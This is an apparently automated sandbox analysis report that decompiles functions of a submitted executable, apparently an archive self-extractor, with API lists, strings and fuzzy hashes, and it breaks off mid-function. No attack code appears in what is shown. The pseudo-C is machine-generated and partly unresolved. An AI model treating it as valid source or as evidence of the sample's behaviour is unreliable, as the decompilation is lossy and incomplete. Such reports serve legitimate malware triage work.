C:\Users\user\Desktop\file.exe, xrefs: 00E879C5, 00E879CC, 00E879FB, 00E87A33

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\file.exe
API String ID: 2506810119-2502435711
Opcode ID: 4497e14cbdda549ba69710acf518479ef4458c2d2811ddf830b3c49c61ea05fa
Instruction ID: 8f65fb6b16d50dddcb05244856e26599cd24d0f5831db788e8b528d690afdf56
Opcode Fuzzy Hash: 4497e14cbdda549ba69710acf518479ef4458c2d2811ddf830b3c49c61ea05fa
Instruction Fuzzy Hash: 3C31B171A08208EFCB25FF9AD981D9EBBFCEB85314B2410A6E84CB7211D6718E418750

Uniqueness

Uniqueness Score: -1.00%

Function 00E67638 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00E67638(void* __ebx, void* __edx, void* __esi) {
				void* _t26;
				long _t32;
				void* _t39;
				void* _t42;
				intOrPtr _t43;
				void* _t52;
				void* _t57;
				void* _t58;
				void* _t61;

				_t57 = __esi;
				_t52 = __edx;
				_t42 = __ebx;
				E00E7E554(E00E92153, _t61);
				E00E7E630();
				 *((intOrPtr*)(_t61 - 0x20)) = 0;
				 *((intOrPtr*)(_t61 - 0x1c)) = 0;
				 *((intOrPtr*)(_t61 - 0x18)) = 0;
				 *((intOrPtr*)(_t61 - 0x14)) = 0;
				 *((char*)(_t61 - 0x10)) = 0;
				_t54 =  *((intOrPtr*)(_t61 + 8));
				_push(0);
				_push(0);
				 *((intOrPtr*)(_t61 - 4)) = 0;
				_push(_t61 - 0x20);
				if(E00E63AC2( *((intOrPtr*)(_t61 + 8)), _t52) != 0) {
					if( *0xea0eb2 == 0) {
						if(E00E67CC4(L"SeSecurityPrivilege") != 0) {
							 *0xea0eb1 = 1;
						}
						E00E67CC4(L"SeRestorePrivilege");
						 *0xea0eb2 = 1;
					}
					_push(_t57);
					_t58 = 7;
					if( *0xea0eb1 != 0) {
						_t58 = 0xf;
					}
					_push(_t42);
					_t43 =  *((intOrPtr*)(_t61 - 0x20));
					_push(_t43);
					_push(_t58);
					_push( *((intOrPtr*)(_t61 + 0xc)));
					if( *0xec2000() == 0) {
						if(E00E6B85C( *((intOrPtr*)(_t61 + 0xc)), _t61 - 0x106c, 0x800) == 0) {
							L10:
							E00E66D72(_t70, 0x52, _t54 + 0x24,  *((intOrPtr*)(_t61 + 0xc)));
							_t32 = GetLastError();
							E00E67002(_t70);
							if(_t32 == 5 && E00E702FB() == 0) {
								E00E6158D(_t61 - 0x6c, 0x18);
								E00E71107(_t61 - 0x6c);
							}
							E00E66FBA(0xea0f50, 1);
						} else {
							_t39 =  *0xec2000(_t61 - 0x106c, _t58, _t43);
							_t70 = _t39;
							if(_t39 == 0) {
								goto L10;
							}
						}
					}
				}
				_t26 = E00E615C2(_t61 - 0x20);
				 *[fs:0x0] =  *((intOrPtr*)(_t61 - 0xc));
				return _t26;
			}

0x00e67638
0x00e67638
0x00e67638
0x00e6763d
0x00e67647
0x00e6764f
0x00e67652
0x00e67655
0x00e67658
0x00e6765b
0x00e6765e
0x00e67663
0x00e67664
0x00e67665
0x00e6766b
0x00e67673
0x00e67680
0x00e6768e
0x00e67690
0x00e67690
0x00e6769c
0x00e676a1
0x00e676a1
0x00e676af
0x00e676b2
0x00e676b3
0x00e676b7
0x00e676b7
0x00e676b8
0x00e676b9
0x00e676bc
0x00e676bd
0x00e676be
0x00e676c9
0x00e676e1
0x00e676f6
0x00e676ff
0x00e67704
0x00e67713
0x00e6771b
0x00e6772b
0x00e67733
0x00e67733
0x00e6773c
0x00e676e3
0x00e676ec
0x00e676f2
0x00e676f4
0x00000000
0x00000000
0x00e676f4
0x00e676e1
0x00e67742
0x00e67746
0x00e6774f
0x00e67759

APIs

__EH_prolog.LIBCMT ref: 00E6763D

Part of subcall function 00E63AC2: __EH_prolog.LIBCMT ref: 00E63AC7

GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 00E67704

Part of subcall function 00E67CC4: GetCurrentProcess.KERNEL32(00000020,?), ref: 00E67CD3
Part of subcall function 00E67CC4: GetLastError.KERNEL32 ref: 00E67D19
Part of subcall function 00E67CC4: CloseHandle.KERNEL32(?), ref: 00E67D28

Strings

SeRestorePrivilege, xrefs: 00E67697
SeSecurityPrivilege, xrefs: 00E67682

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: 2335401f0e53c5bfa2973e5eb869ac6b1ce3c4028bce0ee5b05d147338ee113a
Instruction ID: 945a676f925fbf61b02ca53be474820f688b263a79c046473fa537f834f887ae
Opcode Fuzzy Hash: 2335401f0e53c5bfa2973e5eb869ac6b1ce3c4028bce0ee5b05d147338ee113a
Instruction Fuzzy Hash: 56312871984244AEDF10EF64EC41BEEBBF9AF5539CF04A05AF889B7142C7705A44C761

Uniqueness

Uniqueness Score: -1.00%

Function 00E7A6C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00E7A6C0(void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR** _a16) {
				void* _t12;
				void* _t16;
				void* _t19;
				void* _t22;
				WCHAR** _t24;
				void* _t25;
				intOrPtr _t27;
				void* _t28;
				struct HWND__* _t30;
				signed short _t31;

				_t24 = _a16;
				_t31 = _a12;
				_t30 = _a4;
				_t27 = _a8;
				if(E00E6130B(__edx, _t30, _t27, _t31, _t24, L"ASKNEXTVOL", 0, 0) != 0) {
					L14:
					__eflags = 1;
					return 1;
				}
				_t28 = _t27 - 0x110;
				if(_t28 == 0) {
					_push( *_t24);
					 *0xec0cb0 = _t24;
					L13:
					SetDlgItemTextW(_t30, 0x66, ??);
					goto L14;
				}
				if(_t28 != 1) {
					L6:
					return 0;
				}
				_t12 = (_t31 & 0x0000ffff) - 1;
				if(_t12 == 0) {
					GetDlgItemTextW(_t30, 0x66,  *( *0xec0cb0), ( *0xec0cb0)[1]);
					_push(1);
					L10:
					EndDialog(_t30, ??);
					goto L14;
				}
				_t16 = _t12 - 1;
				if(_t16 == 0) {
					_push(0);
					goto L10;
				}
				if(_t16 == 0x65) {
					_t19 = E00E6BE89(__eflags,  *( *0xec0cb0));
					_t22 = E00E610F0(_t30, E00E6E0AC(_t25, 0x8e),  *( *0xec0cb0), _t19, 0);
					__eflags = _t22;
					if(_t22 == 0) {
						goto L14;
					}
					_push( *( *0xec0cb0));
					goto L13;
				}
				goto L6;
			}

0x00e7a6c1
0x00e7a6c6
0x00e7a6cb
0x00e7a6d0
0x00e7a6e8
0x00e7a778
0x00e7a77a
0x00000000
0x00e7a77a
0x00e7a6ee
0x00e7a6f4
0x00e7a767
0x00e7a769
0x00e7a76f
0x00e7a772
0x00000000
0x00e7a772
0x00e7a6f9
0x00e7a70d
0x00000000
0x00e7a70d
0x00e7a6fe
0x00e7a701
0x00e7a75d
0x00e7a763
0x00e7a747
0x00e7a748
0x00000000
0x00e7a748
0x00e7a703
0x00e7a706
0x00e7a745
0x00000000
0x00e7a745
0x00e7a70b
0x00e7a71a
0x00e7a733
0x00e7a738
0x00e7a73a
0x00000000
0x00000000
0x00e7a741
0x00000000
0x00e7a741
0x00000000

APIs

Part of subcall function 00E6130B: GetDlgItem.USER32(00000000,00003021), ref: 00E6134F
Part of subcall function 00E6130B: SetWindowTextW.USER32(00000000,00E935B4), ref: 00E61365

EndDialog.USER32(?,00000001), ref: 00E7A748
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00E7A75D
SetDlgItemTextW.USER32(?,00000066,?), ref: 00E7A772

Strings

ASKNEXTVOL, xrefs: 00E7A6D8

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: 05ddc84e07a1040105d00aba9b1ddc41ed3de85a79921ce8d9b22edc10ea4ef0
Instruction ID: d121ac7728b8e7d56defa6ab883d3c82ce4f77ea28b4765abcbc3a062595f8bb
Opcode Fuzzy Hash: 05ddc84e07a1040105d00aba9b1ddc41ed3de85a79921ce8d9b22edc10ea4ef0
Instruction Fuzzy Hash: EB112632240200AFD7159F68EC49F6E77B8EB8A345F285036F304BB1B1C76298068B26

Uniqueness

Uniqueness Score: -1.00%

Function 00E6D483 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00E6D483(void* __ebx, void* __ecx, void* __edi) {
				void* __esi;
				intOrPtr _t26;
				signed int* _t30;
				void* _t31;
				void* _t34;
				void* _t42;
				void* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t50;

				_t44 = __edi;
				_t43 = __ecx;
				_t42 = __ebx;
				_t48 = _t49 - 0x64;
				_t50 = _t49 - 0xac;
				_t46 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x2c)) > 0) {
					 *((intOrPtr*)(_t48 + 0x5c)) =  *((intOrPtr*)(_t48 + 0x6c));
					 *((char*)(_t48 + 8)) = 0;
					 *((intOrPtr*)(_t48 + 0x60)) = _t48 + 8;
					if( *((intOrPtr*)(_t48 + 0x74)) != 0) {
						E00E718AE( *((intOrPtr*)(_t48 + 0x74)), _t48 - 0x48, 0x50);
					}
					_t26 =  *((intOrPtr*)(_t48 + 0x70));
					if(_t26 == 0) {
						E00E700D6(_t48 + 8, "s", 0x50);
					} else {
						_t34 = _t26 - 1;
						if(_t34 == 0) {
							_push(_t48 - 0x48);
							_push("$%s");
							goto L9;
						} else {
							if(_t34 == 1) {
								_push(_t48 - 0x48);
								_push("@%s");
								L9:
								_push(0x50);
								_push(_t48 + 8);
								E00E6E046();
								_t50 = _t50 + 0x10;
							}
						}
					}
					_t16 = _t46 + 0x18; // 0x63
					_t18 = _t46 + 0x14; // 0x30b9ec0
					_t30 = E00E85BC9(_t42, _t43, _t44, _t46, _t48 + 0x58,  *_t18,  *_t16, 4, E00E6D2A0);
					if(_t30 == 0) {
						goto L1;
					} else {
						_t20 = 0xe9e158 +  *_t30 * 0xc; // 0xe946b8
						E00E86230( *((intOrPtr*)(_t48 + 0x78)),  *_t20,  *((intOrPtr*)(_t48 + 0x7c)));
						_t31 = 1;
					}
				} else {
					L1:
					_t31 = 0;
				}
				return _t31;
			}

0x00e6d483
0x00e6d483
0x00e6d483
0x00e6d484
0x00e6d488
0x00e6d48f
0x00e6d495
0x00e6d4a5
0x00e6d4ab
0x00e6d4af
0x00e6d4b2
0x00e6d4bd
0x00e6d4bd
0x00e6d4c5
0x00e6d4c8
0x00e6d503
0x00e6d4ca
0x00e6d4ca
0x00e6d4cd
0x00e6d4e2
0x00e6d4e3
0x00000000
0x00e6d4cf
0x00e6d4d2
0x00e6d4d7
0x00e6d4d8
0x00e6d4e8
0x00e6d4eb
0x00e6d4ed
0x00e6d4ee
0x00e6d4f3
0x00e6d4f3
0x00e6d4d2
0x00e6d4cd
0x00e6d50f
0x00e6d515
0x00e6d519
0x00e6d523
0x00000000
0x00e6d529
0x00e6d52f
0x00e6d538
0x00e6d540
0x00e6d540
0x00e6d497
0x00e6d497
0x00e6d497
0x00e6d497
0x00e6d547

APIs

__fprintf_l.LIBCMT ref: 00E6D4EE
_strncpy.LIBCMT ref: 00E6D538

Strings

$%s, xrefs: 00E6D4E3
@%s, xrefs: 00E6D4D8

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: __fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 1857242416-834177443
Opcode ID: 9ad0b76eb8fac31020c8cdb8806a1d52f1694659bebb32356005297c5a3d4ad0
Instruction ID: ede28949fea9f9eea47c5fd9765ea948260e5705c9da57dac1df455a7e0b6f35
Opcode Fuzzy Hash: 9ad0b76eb8fac31020c8cdb8806a1d52f1694659bebb32356005297c5a3d4ad0
Instruction Fuzzy Hash: 3B218172A84308EADF30EEA4DD41FDE3BA8AB04344F446412FA15B61A1E771EA548B61

Uniqueness

Uniqueness Score: -1.00%

Function 00E70995 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00E70995(long* __ecx, long _a4) {
				void* __esi;
				void* __ebp;
				long _t11;
				void* _t14;
				long _t23;
				long* _t25;

				_t19 = __ecx;
				_t11 = _a4;
				_t25 = __ecx;
				_t23 = 0x40;
				 *__ecx = _t11;
				if(_t11 > _t23) {
					 *__ecx = _t23;
				}
				if( *_t25 == 0) {
					 *_t25 = 1;
				}
				_t25[0x41] = 0;
				if( *_t25 > _t23) {
					 *_t25 = _t23;
				}
				_t3 =  &(_t25[0xc8]); // 0x320
				_t25[0xc5] = 0;
				InitializeCriticalSection(_t3);
				_t25[0xc6] = CreateSemaphoreW(0, 0, _t23, 0);
				_t14 = CreateEventW(0, 1, 1, 0);
				_t25[0xc7] = _t14;
				if(_t25[0xc6] == 0 || _t14 == 0) {
					_push(L"\nThread pool initialization failed.");
					_push(0xea0f50);
					E00E66E63(E00E66E68(_t19), 0xea0f50, _t25, 2);
				}
				_t25[0xc3] = 0;
				_t25[0xc4] = 0;
				_t25[0x42] = 0;
				return _t25;
			}

0x00e70995
0x00e70995
0x00e7099d
0x00e709a1
0x00e709a2
0x00e709a6
0x00e709a8
0x00e709a8
0x00e709b1
0x00e709b3
0x00e709b3
0x00e709b5
0x00e709bd
0x00e709bf
0x00e709bf
0x00e709c1
0x00e709c7
0x00e709ce
0x00e709e2
0x00e709e8
0x00e709ee
0x00e709fa
0x00e70a00
0x00e70a0a
0x00e70a16
0x00e70a16
0x00e70a1c
0x00e70a24
0x00e70a2a
0x00e70a33

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00E6ADB5,00000008,?,00000000,?,00E6CD8C,?,00000000), ref: 00E709CE
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00E6ADB5,00000008,?,00000000,?,00E6CD8C,?,00000000), ref: 00E709D8
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00E6ADB5,00000008,?,00000000,?,00E6CD8C,?,00000000), ref: 00E709E8

Strings

Thread pool initialization failed., xrefs: 00E70A00

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 4380ad12ee6ebf17660400bcb94fccd949f5a3b5d1922a9d0239ccd0932300ea
Instruction ID: cab8efabbf6a1b1f8c8d58f55a4becfb8e05b35d43121bd1733832d1f6c7d089
Opcode Fuzzy Hash: 4380ad12ee6ebf17660400bcb94fccd949f5a3b5d1922a9d0239ccd0932300ea
Instruction Fuzzy Hash: 681151B1540708AFD3315F7698859A7FBECEB95754F10582FE2DAA2201D6716A80CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00E7D648 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E7D648(long _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				WCHAR* _t16;
				_Unknown_base(*)()* _t19;
				int _t22;

				 *0xebdc88 = _a12;
				 *0xebdc8c = _a16;
				 *0xea8464 = _a20;
				if( *0xea8460 == 0) {
					if( *0xea8453 == 0) {
						_t19 = E00E7BB70;
						_t16 = L"REPLACEFILEDLG";
						while(1) {
							_t22 = DialogBoxParamW( *0xea0ed4, _t16,  *0xea8458, _t19, _a4);
							if(_t22 != 4) {
								break;
							}
							if(DialogBoxParamW( *0xea0ed0, L"RENAMEDLG",  *0xea844c, E00E7CF50, _a4) != 0) {
								break;
							}
						}
						return _t22;
					}
					return 1;
				}
				return 0;
			}

0x00e7d655
0x00e7d65d
0x00e7d665
0x00e7d66a
0x00e7d677
0x00e7d681
0x00e7d686
0x00e7d6b0
0x00e7d6c7
0x00e7d6cc
0x00000000
0x00000000
0x00e7d6ae
0x00000000
0x00000000
0x00e7d6ae
0x00000000
0x00e7d6d2
0x00000000
0x00e7d67b
0x00000000

Strings

RENAMEDLG, xrefs: 00E7D69B
REPLACEFILEDLG, xrefs: 00E7D686, 00E7D6BA

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 30c5f8e21ea603855fc4f917fcc24432403e688d085193d65f8562ba064be375
Instruction ID: 7652330d7bfef5c6a4139f926782590e9d217cce25c8a5543e1569fe328aabe7
Opcode Fuzzy Hash: 30c5f8e21ea603855fc4f917fcc24432403e688d085193d65f8562ba064be375
Instruction Fuzzy Hash: 4C01D871608205AFCB114F96ED04E567FF9EB0D394B009426F91DF2170D672AC58EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E7B118 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E7B118(char _a8, char _a12) {
				void* _t4;
				intOrPtr* _t5;
				long _t14;

				if( *0xea8450 == 0) {
					_t1 =  &_a8; // 0xe66d6c
					_t5 =  *_t1;
					if( *_t5 != 0) {
						_t14 = GetLastError();
						E00E63F62(0xebecb0, 0x1000, _a8, 0,  &_a12);
						_t5 = E00E7A888(L"%s", 0xebecb0);
						if(_t14 != 0) {
							SetLastError(_t14);
						}
					}
					return _t5;
				}
				return _t4;
			}

0x00e7b11f
0x00e7b121
0x00e7b121
0x00e7b12b
0x00e7b134
0x00e7b14b
0x00e7b156
0x00e7b160
0x00e7b163
0x00e7b163
0x00e7b169
0x00000000
0x00e7b16a
0x00e7b16b

APIs

GetLastError.KERNEL32(?,?,00E711AF,?,00000000,00000456,00EA0F50,?,00E66D6C,00000001), ref: 00E7B12E
__vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E7B14B
SetLastError.KERNEL32(00000000,?,00000000,00000456,00EA0F50,?,00E66D6C,00000001), ref: 00E7B163

Strings

lm, xrefs: 00E7B121

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: ErrorLast$__vswprintf_c_l
String ID: lm
API String ID: 1233239087-664774740
Opcode ID: d02e2111c2a1f2a0f8de914fa745b6e0c5eb356805138b78c7d3cf209404f315
Instruction ID: 41f306e313529aaa49cbc0803276b0d37d592e554dec7ebc53b15ec6d72d8d75
Opcode Fuzzy Hash: d02e2111c2a1f2a0f8de914fa745b6e0c5eb356805138b78c7d3cf209404f315
Instruction Fuzzy Hash: D5E022729012407FC312AB25AC05FEF7FACABCAB98F456016F80572266CB604D4687A2

Uniqueness

Uniqueness Score: -1.00%

Function 00E894EE Relevance: 6.3, APIs: 4, Instructions: 305
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E00E894EE(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E00E840A6(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v48 + 0x88))))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E00E7E7B0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E00E7E7B0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t54 = _t186 - 1; // 0xe84d11
							_t116 = _t54;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E00E7F5F0(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E00E7E7B0( *_a4, 0x34, _t174);
								_t137 = 0;
